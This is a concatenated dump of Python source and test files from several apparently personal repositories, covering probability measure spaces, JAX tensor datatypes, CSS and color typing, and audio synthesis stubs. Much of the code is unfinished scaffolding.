#### File: volume/power/_power.py
```python
from dataclasses import dataclass
from .._volume import Volume
@dataclass
class Power(
float,
Volume,
):
def __init__(
self,
val: float,
):
# [TODO] confirm
        assert 0.0 <= val <= 1.0, ValueError("Power must be between 0.0 and 1.0.")
super(Power, self).__new__(
float,
val,
)
```
|
{
"source": "jedhsu/probability",
"score": 2
}
|
#### File: algebra/_tests/test_sigma.py
```python
from ..sigma import AbstractSpace, Set, SigmaAlgebra, Test
class TestSigmaAlgebra:
def test_init(self):
alg = SigmaAlgebra(AbstractSpace(1, 2, 3))
assert isinstance(alg, SigmaAlgebra)
assert isinstance(alg, Set)
assert alg.space == AbstractSpace(1, 2, 3)
def test_contains_generating_set(self):
alg = SigmaAlgebra(AbstractSpace(1, 2, 3))
        assert alg.space in alg  # [TODO] confirm the intended membership check
```
#### File: measure/_tests/test_aspace.py
```python
from ..aspace import AbstractSpace, Set, Test
class TestAbstractSpace:
def test_init(self):
aspace = Test.integers()
assert isinstance(aspace, AbstractSpace)
assert isinstance(aspace, Set)
assert len(aspace) == 3
```
#### File: probability/probability/distribution.py
```python
from __future__ import annotations
from fractions import Fraction
from typing import Mapping
from .event import Event
from .measurable import Measurable
from .moment import Moment
from .probability import Probabilistic
__all__ = ["Distribution"]
class MomentGeneratingFunction:
def moment_generating_function(self):
        # [TODO] Expectation, exp, t, and X are unresolved sketches here
        return Expectation(exp(t * X))
class Distribution(
Moment,
MomentGeneratingFunction,
Mapping[Probabilistic, Measurable],
):
pass
class Cumulative(Distribution):
"""
Cumulative distribution function.
"""
def __call__(self):
pass
class Test:
@staticmethod
def dice_roll():
        # a fair die assigns probability 1/6 to each face (the weights must sum to 1)
        dist = {
            Event(1): Fraction(1, 6),
            Event(2): Fraction(1, 6),
            Event(3): Fraction(1, 6),
            Event(4): Fraction(1, 6),
            Event(5): Fraction(1, 6),
            Event(6): Fraction(1, 6),
        }
# [TODO] need to deal with the typing here
return Distribution(dist)
```
#### File: probability/space/measure.py
```python
from dataclasses import dataclass
from typing import Generic
from typing import Hashable
from typing import Optional
from typing import TypeVar
from sympy import Expr
from ..measure import MeasurableFunction
from .measurable import MeasurableSpace
__all__ = ["MeasureSpace"]
T = TypeVar("T", bound=Hashable)
@dataclass(frozen=True)
class MeasureSpace(
MeasurableSpace[T],
Generic[T],
):
"""
Inherits omega space and sigma-algebra.
"""
_μ_: MeasurableFunction[T]
# [Properties]
    def monotonic(self, set_A: set[T], set_B: set[T]) -> Optional[Expr]:
        """
        Monotonicity: A ⊂ B implies μ(A) <= μ(B)
        """
        # [TODO] Expr can be subtyped to Inequality
        if set_A <= set_B:  # subset test rather than membership
            return Expr(self._μ_(set_A) <= self._μ_(set_B))
        return None
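    # Example: under a counting measure on {1, 2, 3}, A = {1} ⊆ B = {1, 2}
    # gives μ(A) = 1 <= 2 = μ(B), so monotonic(A, B) yields a true inequality.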
# [TODO] use sympy structs for the countably infinite stuff
    def subadditive(self, set_: set[T], countable_union_of_sets) -> Optional[Expr]:
        pass
    def continuous_from_below(self, seq) -> Optional[Expr]:
        pass
    def continuous_from_above(self, seq) -> Optional[Expr]:
        pass
```
|
{
"source": "jedhsu/tensor",
"score": 2
}
|
#### File: jedhsu/tensor/noxfile.py
```python
import nox
from nox_poetry import Session
from nox_poetry import session
from pathlib import Path
from textwrap import dedent
import sys
import shutil
package = "{{cookiecutter.package_name}}"
python_versions = [
"3.9",
"3.8",
"3.7",
]
nox.needs_version = ">= 2021.6.6"
nox.options.sessions = (
"pre-commit",
# "mypy",
# "typeguard",
# "security",
# "tests",
# "examples",
# "docs-build",
)
"""
*activate*
Activates venv using precommit hooks.
"""
def activate(
session: Session,
):
if session.bin is None:
return
virtualenv = session.env.get("VIRTUAL_ENV")
if virtualenv is None:
return
hookdir = Path(".git") / "hooks"
if not hookdir.is_dir():
return
for hook in hookdir.iterdir():
if hook.name.endswith(".sample") or not hook.is_file():
continue
text = hook.read_text()
bindir = repr(session.bin)[1:-1] # strip quotes
if not (
(Path("A") == Path("a") and bindir.lower() in text.lower())
            or (bindir in text)
):
continue
lines = text.splitlines()
if not (lines[0].startswith("#!") and "python" in lines[0].lower()):
continue
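        # The dedented header below pins VIRTUAL_ENV and PATH so the Git hook
        # runs inside the Nox-managed virtualenv instead of the system Python.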
header = dedent(
f"""\
import os
os.environ["VIRTUAL_ENV"] = {virtualenv!r}
os.environ["PATH"] = os.pathsep.join((
{session.bin!r},
os.environ.get("PATH", ""),
))
"""
)
lines.insert(1, header)
hook.write_text("\n".join(lines))
"""
*lint*
Lint using pre-commit.
"""
@session(
name="pre-commit",
python="3.9",
)
def lint(
session: Session,
):
args = session.posargs or [
"run",
"--all-files",
"--show-diff-on-failure",
]
session.install(
"black",
"darglint",
"flake8",
"flake8-bandit",
"flake8-bugbear",
"flake8-docstrings",
"flake8-rst-docstrings",
"pep8-naming",
"pre-commit",
"pre-commit-hooks",
"reorder-python-imports",
)
session.run("pre-commit", *args)
if args and args[0] == "install":
activate(session)
# """
# *static-types*
# Check for well-typedness through _mypy_.
# """
# @session(
# python=python_versions,
# )
# def mypy(
# session: Session,
# ) -> None:
# args = session.posargs or [
# "src",
# "tests",
# "docs/conf.py",
# ]
# session.install(".")
# session.install(
# "mypy",
# "pytest",
# )
# session.run(
# "mypy",
# *args,
# )
# if not session.posargs:
# session.run(
# "mypy",
# f"--python-executable={sys.executable}",
# "noxfile.py",
# )
# """
# *tests*
# Runs the test suite with _pytest_.
# """
# @session(
# python=[
# "3.9",
# "3.8",
# "3.7",
# ]
# )
# def tests(
# session: Session,
# ) -> None:
# session.install(".")
# session.install(
# "coverage[toml]",
# "pytest",
# "pygments",
# )
# try:
# session.run(
# "coverage",
# "run",
# "--parallel",
# "-m",
# "pytest",
# *session.posargs,
# )
# finally:
# if session.interactive:
# session.notify(
# "coverage",
# posargs=[],
# )
# """
# *runtime-types*
# Checks for type safety at runtime with _typeguard_.
# """
# @session(
# python=python_versions,
# )
# def typeguard(
# session: Session,
# ):
# session.install(".")
# session.install(
# "pytest",
# "typeguard",
# "pygments",
# )
# session.run(
# "pytest",
# f"--typeguard-packages={package}",
# *session.posargs,
# )
# """
# *security*
# Scans dependencies for insecure packages through _safety_.
# """
# @session(python="3.9")
# def security(
# session: Session,
# ) -> None:
# requirements = session.poetry.export_requirements()
# session.install("safety")
# session.run(
# "safety",
# "check",
# "--full-report",
# f"--file={requirements}",
# )
# """
# *coverage*
# Analyzes code coverage with _coverage_.
# """
# @session
# def coverage(
# session: Session,
# ) -> None:
# args = session.posargs or ["report"]
# session.install("coverage[toml]")
# if not session.posargs and any(Path().glob(".coverage.*")):
# session.run("coverage", "combine")
# session.run("coverage", *args)
# """
# *docs-build*
# Build the docs.
# """
# @session(
# name="docs-build",
# python="3.9",
# )
# def docs_build(
# session: Session,
# ) -> None:
# """Build the documentation."""
# args = session.posargs or [
# "docs",
# "docs/_build",
# ]
# session.install(".")
# session.install(
# "sphinx",
# "sphinx-click",
# "sphinx-rtd-theme",
# )
# build_dir = Path(
# "docs",
# "_build",
# )
# if build_dir.exists():
# shutil.rmtree(build_dir)
# session.run(
# "sphinx-build",
# *args,
# )
# """
# *build-with-view*
# Build and serve the documentation with live reloading on changes.
# """
# @session(
# python="3.9",
# )
# def docs(
# session: Session,
# ) -> None:
# args = session.posargs or [
# "--open-browser",
# "docs",
# "docs/_build",
# ]
# session.install(".")
# session.install(
# "sphinx",
# "sphinx-autobuild",
# "sphinx-click",
# "sphinx-rtd-theme",
# )
# build_dir = Path("docs", "_build")
# if build_dir.exists():
# shutil.rmtree(build_dir)
# session.run(
# "sphinx-autobuild",
# *args,
# )
# """
# *examples*
# Run examples with xdoctest.
# """
# @session(
# python=python_versions,
# )
# def examples(
# session: Session,
# ) -> None:
# args = session.posargs or ["all"]
# session.install(".")
# session.install("xdoctest[colors]")
# session.run(
# "python",
# "-m",
# "xdoctest",
# package,
# *args,
# )
```
#### File: _array/tests/test_fn.py
```python
# from ..fn import Gradient
# ∇ = 1
# \u2207
# class TestFn:
# def test_lambda(self):
# assert Gradient.λ == 1
```
#### File: datatype/complex/x128.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._complex import Complex
__all__ = ["c128"]
class c128(
    jnp.complex128,
Complex,
Datatype,
):
def __init__(
self,
value: int,
):
super(c128, self).__init__(
self,
value,
)
```
#### File: datatype/float_/x64.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._float import Float
__all__ = ["f64"]
class f64(
jnp.float64,
Float,
Datatype,
):
def __init__(
self,
value: int,
):
super(f64, self).__init__(
self,
value,
)
```
#### File: integer/unsigned/x16.py
```python
import jax.numpy as jnp
from ..._datatype import Datatype
from .._integer import Integer
from ._unsigned import Unsigned
__all__ = ["u16"]
class u16(
jnp.uint16,
Unsigned,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(u16, self).__init__(
self,
value,
)
```
#### File: datatype/integer/x16.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._integer import Integer
__all__ = ["i16"]
class i16(
jnp.int16,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(i16, self).__init__(
self,
value,
)
```
#### File: datatype/integer/x64.py
```python
import jax.numpy as jnp
from .._datatype import Datatype
from ._integer import Integer
__all__ = ["i64"]
class i64(
jnp.int64,
Integer,
Datatype,
):
def __init__(
self,
value: int,
):
super(i64, self).__init__(
self,
value,
)
```
#### File: geometric/manipulation/repeat.py
```python
import jax.numpy as jnp
from ._operator import Manipulation
__all__ = ["Pad"]
class Repeat(
    Manipulation,
):
    # jnp.repeat is a function, not a class, so hold it as the wrapped operator
    # (the pattern BooleanAll uses) rather than subclassing it
    operator = jnp.repeat
def __init__(
self,
*args,
**kwargs,
):
super(Repeat, self).__init__(
*args,
**kwargs,
)
```
#### File: logical/boolean/all.py
```python
import jax.numpy as jnp
from ._operator import BooleanOperator
__all__ = ["BooleanAll"]
class BooleanAll(
BooleanOperator,
):
operator = jnp.all
def __init__(
self,
*args,
**kwargs,
):
super(BooleanAll, self).__init__(
*args,
**kwargs,
)
```
#### File: tensor/coordinate/_coordinate.py
```python
from dataclasses import dataclass
from typing import Sequence
__all__ = ["Coordinate"]
@dataclass
class Coordinate(
tuple[int, ...],
):
def __init__(
self,
elements: Sequence[int],
):
super(Coordinate, self).__new__(
tuple,
elements,
)
@classmethod
def create(
cls,
*element: int,
):
return cls([*element])
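    # Example: Coordinate.create(1, 2, 3) wraps the tuple (1, 2, 3).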
```
#### File: _tensor_old/sized/_sized.py
```python
from math import prod
from typing import Sequence
from .dtype import *
__all__ = ["AbstractSizedArray"]
class _AbstractSizedArray_:
dim: Sequence[int]
class _Eq_(_AbstractSizedArray_):
def __eq__(self, arr: _AbstractSizedArray_) -> bool:
return self.dim == arr.dim
class _ElementSized_(_AbstractSizedArray_):
def elsize(self):
return prod(self.dim)
class _Default_:
@staticmethod
def _1d():
return AbstractSizedArray((5,))
@staticmethod
def _2d_square():
return AbstractSizedArray((5, 5))
@staticmethod
def _2d_rect():
return AbstractSizedArray((5, 10))
@staticmethod
def _3d_cube():
return AbstractSizedArray((5, 5, 5))
# class _Display_:
# # TODO: lets see if this messes anything up
# dim: Sequence[int]
# def _build_left_border(
class _DisplayVector_:
dim: Sequence[int]
def build_display(self, max_cell_width: int = 100):
...
class _ValidateVector_:
dim: Sequence[int]
def validate(self):
assert len(self.dim) == 1, TypeError("Array dimensions not equal to 1.")
class _DisplayMatrix_:
dim: Sequence[int]
def _build_axis(self):
...
def _build_cell(self):
...
class AbstractSizedArray(
_Default_,
_ElementSized_,
_Eq_,
_AbstractSizedArray_,
):
dim: Sequence[int]
def __init__(self, dim: Sequence[int], *args, **kwargs):
self.dim = dim
super(AbstractSizedArray, self).__init__(*args, **kwargs)
def _repr_dim(self) -> str:
string = repr(self.dim)[1:-1]
return string if len(self.dim) > 1 else string[:-1]
def __repr__(self):
return f"AbstractSizedArray[{self._repr_dim()}]"
```
#### File: _tensor_old/tests/test_sized.py
```python
from ..dtype import *
from ..sized import *
from ..sized import _AbstractSizedArray_, _Default_, _ElementSized_, _Eq_
class TestAbstractSizedArray:
def test_init(self):
arr = AbstractSizedArray((1, 2))
assert arr.dim == (1, 2)
assert isinstance(arr, AbstractSizedArray)
def test_mro(self):
assert AbstractSizedArray.__mro__ == (
AbstractSizedArray,
_Default_,
_ElementSized_,
_Eq_,
_AbstractSizedArray_,
object,
)
# TODO: was trying to be explicit on testing super calls
# arr = AbstractSizedArray((1, 2))
# assert 1 == 2, super(
# AbstractSizedArray, super(AbstractSizedArray, arr).__self__
# ).__subclasshook__
# assert super(AbstractSizedArray, arr).__self_class__ == object
def test_eq(self):
assert AbstractSizedArray((5, 3)) == AbstractSizedArray((5, 3))
def test_element_sized(self):
assert AbstractSizedArray((5, 3)).elsize() == 15
def test_defaults(self):
assert AbstractSizedArray._1d() == AbstractSizedArray((5,))
def test_repr(self):
assert repr(AbstractSizedArray._1d()) == "AbstractSizedArray[5]"
assert repr(AbstractSizedArray._2d_square()) == "AbstractSizedArray[5, 5]"
```
#### File: system/axis/test__axis.py
```python
from tensor.tensor.coordinate.system.axis._axis import Axis
class TestAxis:
def test_init(self):
a = Axis(5, 0, 1)
assert isinstance(a, Axis)
assert a.ordinal == 5
assert a.origin == 0
assert a.direction == 1
def test_create(self):
a = Axis.create(5)
assert a.origin == 0
assert a.direction == 1
```
|
{
"source": "jedhsu/text",
"score": 2
}
|
#### File: face/font/face.py
```python
from __future__ import annotations
from dataclasses import dataclass
from typing import Annotated, Union
# [TODO] AtRule, Normal, and Percentage still need to be defined/imported here
@dataclass
class FontFace(AtRule):
    line_gap_override: Annotated[
        bool, property
    ]  # [TODO] keep playing with this - but we want to clarify its return. Time for Annotated
    range: property
    src: property
    size_adjust: property
    ascent_override: property
    @property
    def descent_override(self) -> Union[Normal, Percentage]:
        pass
```
#### File: _typing/color/color.py
```python
from dataclasses import dataclass
from typing import Callable, Union
from .._type import Type
# Percent is assumed to be defined alongside Type in this package.
# class ColorKeyword:
# pass
class Color(
Type,
):
red: Union[int, Percent]
green: Union[int, Percent]
blue: Union[int, Percent]
alpha: Union[int, Percent]
@classmethod
def from_keyword(cls):
pass
@classmethod
def from_rgb(cls):
pass
@classmethod
def from_hsl(cls):
pass
@classmethod
def from_lch(cls):
pass
@classmethod
def from_lab(cls):
"""
From lab coordinate system.
"""
pass
```
#### File: _arl/angle/spectrum.py
```python
from dataclasses import dataclass
from ._color import Angle
__all__ = ["AngleSpectrum"]
@dataclass
class AngleSpectrum:
left: Angle
right: Angle
@classmethod
def create(
cls,
left: Angle,
right: Angle,
):
        assert left < right, "left angle must be less than right angle"
return cls(
left,
right,
)
class RedBlue(AngleSpectrum):
"""
Standard red blue.
"""
def __init__(self):
super(RedBlue, self).__init__(
Angle(0),
Angle(240),
)
```
#### File: color/_rgb/green.py
```python
__all__ = ["Green"]
from ._primary import PrimaryColor
class Green(
PrimaryColor,
):
def __init__(
self,
val: int,
):
super(Green, self).__init__(
val,
)
```
#### File: color/_rgb/_primary.py
```python
from abc import ABCMeta
__all__ = ["PrimaryColor"]
class PrimaryColor(
    int,
    # Spectral,
    metaclass=ABCMeta,  # Python 3 metaclass syntax; __metaclass__ is ignored in Python 3
):
    # An immutable int subclass must set its value in __new__;
    # calling __new__ from __init__ discards the result.
    def __new__(
        cls,
        val: int,
    ):
        assert 0 <= val <= 255, "Primary color value must be in [0, 255]."
        return super(PrimaryColor, cls).__new__(
            cls,
            val,
        )
```
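A standalone sketch of the immutable-subclass pattern fixed above; `Channel` is a hypothetical name, not part of this package:
```python
# Validate an int subclass in __new__, before the object exists.
class Channel(int):
    def __new__(cls, val: int):
        assert 0 <= val <= 255, "channel value must be in [0, 255]"
        return super().__new__(cls, val)
c = Channel(128)
assert c + 1 == 129  # behaves like a plain int
# Channel(300) would raise AssertionError
```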
#### File: color/_rgb/_rgba.py
```python
from dataclasses import dataclass
# from wich.measure.spectral import Spectral
from .red import Red
from .green import Green
from .blue import Blue
__all__ = [
"Rgba",
]
@dataclass
class Rgba(
# Spectral,
# GraphicalColor,
):
red: Red
green: Green
blue: Blue
@classmethod
def create(
cls,
red: int,
green: int,
blue: int,
):
return cls(
Red(red),
Green(green),
Blue(blue),
)
```
#### File: location/coordinate/y.py
```python
from ._coordinate import Coordinate
__all__ = [
    "YCoordinate",
]
class YCoordinate(
Coordinate,
):
def __init__(
self,
integer: int,
):
super(YCoordinate, self).__init__(
integer,
)
```
#### File: _elisp/ki/prefix.py
```python
from typing import Sequence
from dataclasses import dataclass
from .event import KeyEvent
from ._key import Key
__all__ = [
"PrefixKey",
]
@dataclass
class PrefixKey(
Key,
):
def __init__(
self,
events: Sequence[KeyEvent],
):
super(PrefixKey, self).__init__(
events,
)
```
#### File: terminal/param/_parameters.py
```python
from enum import Enum
class TerminalBackgroundMode(Enum):
Light = "light"
Dark = "dark"
class TerminalBackspaceErase(int):
    # bool cannot be subclassed in Python, so subclass int and
    # restrict values to 0/1; set the value in __new__, not __init__.
    def __new__(cls, val: bool):
        return super(TerminalBackspaceErase, cls).__new__(cls, bool(val))
class TerminalParameters:
pass
```
#### File: _elisp/window/_element.py
```python
from abc import ABCMeta
from wich.editor._element import Element
# ElementWidth and ElementHeight are assumed to come from the _shape modules.
class WindowElement(
    Element,
    metaclass=ABCMeta,  # Python 3 metaclass syntax; __metaclass__ is ignored in Python 3
):
    def __init__(
        self,
        width: ElementWidth,
        height: ElementHeight,
    ):
super(WindowElement, self).__init__(
width,
height,
)
```
#### File: property/keyword/_keyword.py
```python
class CascadeKeyword(
    str,
):
    # str is immutable, so the value must be set in __new__;
    # calling __new__ from __init__ discards the result.
    def __new__(
        cls,
        string: str,
    ):
        return super(CascadeKeyword, cls).__new__(
            cls,
            string,
        )
class Test:
@staticmethod
def init():
return CascadeKeyword("abc")
```
#### File: property/_op/declare.py
```python
from ._operator import PropertyOperator
class PropertyDeclare(
PropertyOperator,
):
pass
"""
*Declaration-Block*
"""
from typing import Sequence
from dataclasses import dataclass
__all__ = ["DeclarationBlock"]
from .declaration import Declaration
@dataclass
class DeclarationBlock:
INDENT_LENGTH = 4
declarations: Sequence[Declaration]
@classmethod
def indent(cls, line: str) -> str:
"""
Indents a line of text.
"""
return " " * cls.INDENT_LENGTH + line
def into_css(self) -> str:
declarations = [decl.into_css() for decl in self.declarations]
declarations = [self.indent(decl) + ";" for decl in declarations]
declarations = ["{"] + declarations + ["}"]
declarations = "\n".join(declarations)
return declarations
```
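A usage sketch for `DeclarationBlock.into_css`; the real `Declaration` class is not shown above, so this stand-in only assumes an `into_css()` returning a "prop: value" string:
```python
# Hypothetical stand-in for the Declaration class.
class FakeDeclaration:
    def __init__(self, prop: str, value: str):
        self.prop, self.value = prop, value
    def into_css(self) -> str:
        return f"{self.prop}: {self.value}"
block = DeclarationBlock([FakeDeclaration("color", "red"),
                          FakeDeclaration("margin", "0")])
print(block.into_css())
# {
#     color: red;
#     margin: 0;
# }
```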
#### File: cascade/property/shorthand.py
```python
from ._property import CascadeProperty
from ._property import CascadeValues
__all__ = ["CascadeShorthandProperty"]
class CascadeShorthandProperty(  # renamed from CssShorthandProperty to match __all__
    CascadeProperty,
):
    def __init__(
        self,
        values: CascadeValues,
    ):
        super(CascadeShorthandProperty, self).__init__(
            values,
        )
```
#### File: xml/element/base.py
```python
from abc import ABCMeta
class Content:
pass
class Element:
pass
class Container(type, Element):
    @classmethod
    def __prepare__(metacls, name, bases, **kwargs):
        # a metaclass __prepare__ must return the namespace mapping
        # for the class body; returning None raises a TypeError
        return {}
    def into_xml(self):
        pass
```
#### File: _geoshape/line/line.py
```python
from dataclasses import dataclass
from ..point import Point
__all__ = ["Line"]
@dataclass
class Line:
a: Point
b: Point
    def length(self) -> float:
        # __len__ must return an int, so the Euclidean length is exposed
        # as a regular method instead
        raise NotImplementedError
```
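The length left unimplemented above is presumably the Euclidean distance between the endpoints; a minimal sketch, assuming `Point` exposes numeric `x` and `y` attributes:
```python
import math
# Hypothetical helper; not part of the package above.
def line_length(a, b) -> float:
    return math.hypot(b.x - a.x, b.y - a.y)
```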
#### File: _quad/corner/bottomright.py
```python
from strism._geoshape import Pixel
from ._corner import QuadCorner
__all__ = ["QuadBottomRightCorner"]
class QuadBottomRightCorner(
QuadCorner,
):
def __init__(
self,
x: Pixel,
y: Pixel,
):
super(QuadBottomRightCorner, self).__init__(
x,
y,
)
```
#### File: _quad/side/top.py
```python
from dataclasses import dataclass
from strism._geoshape import Point
from ._side import QuadSide
__all__ = ["QuadTopSide"]
@dataclass
class QuadTopSide(
QuadSide,
):
def __init__(
self,
a: Point,
b: Point,
):
        super(QuadTopSide, self).__init__(
a,
b,
)
```
#### File: _position/_test/test_xpos.py
```python
from ..xpos import Pixel
from ..xpos import Coordinate
from ..xpos import ElementXpos
class TestElementXpos:
def test_init(self):
var = ElementXpos(5)
assert isinstance(var, ElementXpos)
assert isinstance(var, Pixel)
assert isinstance(var, Coordinate)
```
#### File: text/_position/ypos.py
```python
from strism._geoshape import Pixel
from ._coordinate import Coordinate
__all__ = ["ElementYpos"]
class ElementYpos(
Pixel,
Coordinate,
):
def __init__(
self,
height: int,
):
super(ElementYpos, self).__init__(
height,
)
```
#### File: text/_shape/height.py
```python
from strism._geoshape import Pixel
from ._dimension import Dimension
__all__ = ["ElementHeight"]
class ElementHeight(
Pixel,
Dimension,
):
def __init__(
self,
height: int,
):
super(ElementHeight, self).__init__(
height,
)
```
#### File: text/_shape/width.py
```python
from strism._geoshape import Pixel
from ._dimension import Dimension
__all__ = ["ElementWidth"]
class ElementWidth(
Pixel,
Dimension,
):
def __init__(
self,
width: int,
):
super(ElementWidth, self).__init__(
width,
)
```
|
{
"source": "jedhsu/wave",
"score": 2
}
|
#### File: sound/old/pluck.py
```python
from ...base.envelope import AmplitudeEnvelope, Envelope, LevelEnvelope
from fourear.base.frequency.frequency import Frequency
from ...base.sampling import SamplingParameters
from ...base.soundwave import Soundwave
# from ...transform.fill import Fill
from ...base.primary import PrimaryWave, PrimaryWaveType
from ..sound import Sound
class Pluck(Sound):
def __init__(
self,
name: str,
fundamental: Frequency,
amplitude_envelope: AmplitudeEnvelope,
sampling_parameters: SamplingParameters,
):
self.__fundamental = fundamental
self.__amplitude_envelope = amplitude_envelope
super().__init__(name, sampling_parameters)
def synthesize(self) -> Soundwave:
saw = PrimaryWave(
PrimaryWaveType.SAWTOOTH,
self.fundamental,
self.amplitude_envelope,
self._sampling_parameters,
).synthesize()
# TODO: ugly grammar, clean me later
# fill = Fill(saw, self.envelope)
# return saw.apply(fill)
return saw
#######
def __repr__(self) -> str:
return "Pluck"
#######
@property
def fundamental(self) -> Frequency:
"""Fundamental frequency."""
return self.__fundamental
@property
def amplitude_envelope(self) -> AmplitudeEnvelope:
return self.__amplitude_envelope
class PluckFactory:
@staticmethod
def basic():
envelope = Envelope.from_dict(
{
0: LevelEnvelope.from_dict({1: 1, 17: 0}),
5000: LevelEnvelope.from_dict({1: 1, 9: 0}),
11000: LevelEnvelope.from_dict({1: 1, 6: 0}),
22000: LevelEnvelope.from_dict({1: 1, 4: 0}),
}
)
amp_envelope = AmplitudeEnvelope(0, 1, envelope)
pluck = Pluck(
"Test_Pluck",
fundamental=Frequency(600.0),
amplitude_envelope=amp_envelope,
sampling_parameters=SamplingParameters(),
)
number_of_samples = pluck._sampling_parameters.number_of_samples(
amp_envelope.ending_frame
)
wf = pluck.synthesize()
pluck.save(wf, number_of_samples)
```
#### File: ampl/_tests/test_decibel.py
```python
# from ..decibel import Decibel
# class TestDecibel:
# def test_init(self):
# db = Decibel(-10)
# assert db == -10
# class TestFrom:
# pass
```
#### File: wave/base/point.py
```python
from dataclasses import dataclass
from types import GenericAlias  # GenericAlias lives in types, not typing
from typing import Generic, TypeVar
T = TypeVar("T")
U = TypeVar("U")
@dataclass
class _Point(Generic[T, U]):
x: T
y: U
class _Point_(_Point):
    def __class_getitem__(cls, item):
        # return a parametrized alias, e.g. Point[int, float]
        return GenericAlias(cls, item)
class _Display_(_Point):
def __repr__(self) -> str:
return f"({self.x}, {self.y})"
class Point(
_Display_,
_Point_,
_Point,
Generic[T, U],
):
def __init__(self, x: T, y: U):
super(Point, self).__init__(x, y)
```
#### File: wave/fourier/coeff.py
```python
__all__ = ["Coefficients"]
from abc import ABCMeta
from dataclasses import dataclass
from typing import Iterator
from .math import Function
@dataclass(frozen=True)
class _Coefficients:
function: Function
class _Iterate_(Iterator):
def __next__(self):
...
def __iter__(self):
return self
class Coefficients(
_Iterate_,
metaclass=ABCMeta,
):
def __init__(self, fn: Function):
...
```
#### File: wave/freq/angular.py
```python
from __future__ import annotations
from dataclasses import dataclass
from ..time import Duration
from .base import Frequency
__all__ = ["AngularFrequency"]
class _Set_:
def _set(self, val: float):
self._value = val
@dataclass
class _AngularFrequency(_Set_):
_value: float
class _Mutate_(_AngularFrequency):
def mutate(self, val: float):
self._set(val)
class _From_:
@staticmethod
def from_cycle_frequency(freq: Frequency) -> AngularFrequency:
...
@staticmethod
def from_duration(dur: Duration) -> AngularFrequency:
...
class _Into_(_AngularFrequency):
def into_cycle_frequency(self) -> Frequency:
...
class _Convert_(_From_, _Into_):
...
class _Display_(_AngularFrequency):
units = "radians / second"
def __repr__(self) -> str:
return f"{self._value} {self.units}"
class AngularFrequency(
_Convert_,
_Mutate_,
_AngularFrequency,
):
def __init__(self, value: float):
super(AngularFrequency, self).__init__(value)
```
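The `_From_`/`_Into_` stubs presumably encode the standard ω = 2πf relationship; a self-contained sketch of both directions:
```python
import math
def angular_from_cycle(freq_hz: float) -> float:
    # ω = 2πf: radians per second from cycles per second
    return 2 * math.pi * freq_hz
def cycle_from_angular(omega: float) -> float:
    # f = ω / 2π
    return omega / (2 * math.pi)
assert math.isclose(cycle_from_angular(angular_from_cycle(440.0)), 440.0)
```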
#### File: trackold/param/tempo.py
```python
from dataclasses import dataclass
class _Mutate_:
def mutate_bpm(self, val: float):
        self.beats_per_minute = val
@dataclass
class _Tempo(_Mutate_):
beats_per_minute: float # mutable
steps_per_beat: int = 4
beats_per_bar: int = 4
# class _Beat(_Tempo):
# beats_per_minute: float # mutable
class _Tempo_(_Tempo):
"""
Pure temporal conversions.
"""
@property
def steps_pm(self) -> float:
        return self.beats_per_minute * self.steps_per_beat
@property
def bars_pm(self) -> float:
        return self.beats_per_minute / self.beats_per_bar
class Tempo(
_Tempo_,
_Tempo,
):
def __init__(
self,
bpm: float,
):
        super(Tempo, self).__init__(bpm)
```
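With the field names unified above, the conversions read directly off the dataclass defaults; a short usage sketch, assuming `Tempo` is importable:
```python
tempo = Tempo(120.0)   # 120 beats per minute
print(tempo.steps_pm)  # 480.0 (4 steps per beat)
print(tempo.bars_pm)   # 30.0 (4 beats per bar)
tempo.mutate_bpm(90.0)
print(tempo.steps_pm)  # 360.0
```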
#### File: transformold/_base/effect.py
```python
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from ear4.wave import Wave
@dataclass(frozen=True)
class _Effect:
source: Wave # source sound wave
class _Effect_(
_Effect,
metaclass=ABCMeta,
):
@abstractmethod
def apply(self) -> Wave:
"""
Applies effect to return an output wave.
* Main API function for effect.
"""
pass
@abstractmethod
def diff(self) -> Wave:
"""
Difference in waveform from source and result.
"""
pass
class Effect(
_Effect_,
_Effect,
metaclass=ABCMeta,
):
...
```
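To make the apply/diff contract concrete, a hedged sketch of a trivial gain effect; it assumes `Wave` supports scalar multiplication and subtraction, which the abstract base does not guarantee:
```python
from dataclasses import dataclass
@dataclass(frozen=True)
class Gain(Effect):
    factor: float = 1.0
    def apply(self) -> Wave:
        # scale every sample by the gain factor (assumes Wave.__mul__)
        return self.source * self.factor
    def diff(self) -> Wave:
        # difference between processed and source (assumes Wave.__sub__)
        return self.apply() - self.source
```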
#### File: transformold/core/q.py
```python
from dataclasses import dataclass
@dataclass
class _Q:
_value: float
class Q(_Q):
def __init__(self, value: float):
super(Q, self).__init__(value)
    @classmethod
    def create(
        cls,
        anchor: "FreqAnchor",  # FreqAnchor and FreqBand are assumed to be defined elsewhere
        band: "FreqBand",
    ):
        ...
```
#### File: transformold/echo/echo.py
```python
from typing import List, Iterator
from ..sound.sound import Sound
from .transform import Transform
from pytest import approx
class Echo(Transform):
    def __init__(self, sounds: List[Sound], weights: List[float]):
        self.__sounds = sounds
        self.__weights = weights
        # __post_init__ only runs for dataclasses, so validate here instead
        assert sum(weights) == approx(1), "Weights must sum to 1."
    #######
    @property
    def sounds(self) -> List[Sound]:
        return self.__sounds
    @property
    def weights(self) -> List[float]:
        return self.__weights
    @property
    def waveform(self) -> Iterator[float]:
        # mix the streams sample by sample; `yield from` would return the
        # generator's final return value, not its yielded samples
        for samples in zip(*(sound.waveform for sound in self.sounds)):
            yield sum(weight * position
                      for weight, position in zip(self.weights, samples))
```
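A tiny standalone check of the per-sample mixing above, using duck-typed stand-ins for `Sound` (only a `waveform` generator is required):
```python
from itertools import islice
class ConstantSound:
    # hypothetical stand-in for Sound: yields a constant sample forever
    def __init__(self, level: float):
        self.level = level
    @property
    def waveform(self):
        while True:
            yield self.level
echo = Echo([ConstantSound(1.0), ConstantSound(0.0)], [0.75, 0.25])
print(list(islice(echo.waveform, 3)))  # [0.75, 0.75, 0.75]
```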
#### File: eq/filter/lp.py
```python
from ..base import Frequency
from .vec import Vector, usize
# SampleRate is assumed to be defined alongside Frequency in the base package.
def get_cutoff_ratio(frequency: Frequency, sample_rate: "SampleRate"):
    ...
def from_range(start: usize, stop: usize) -> Vector:
    ...
def lowpass_filter(cutoff: Frequency, band: Frequency) -> Vector:
    ...
def spectral_invert():
    ...
def highpass_filter(cutoff: Frequency, band: Frequency):
    ...
```
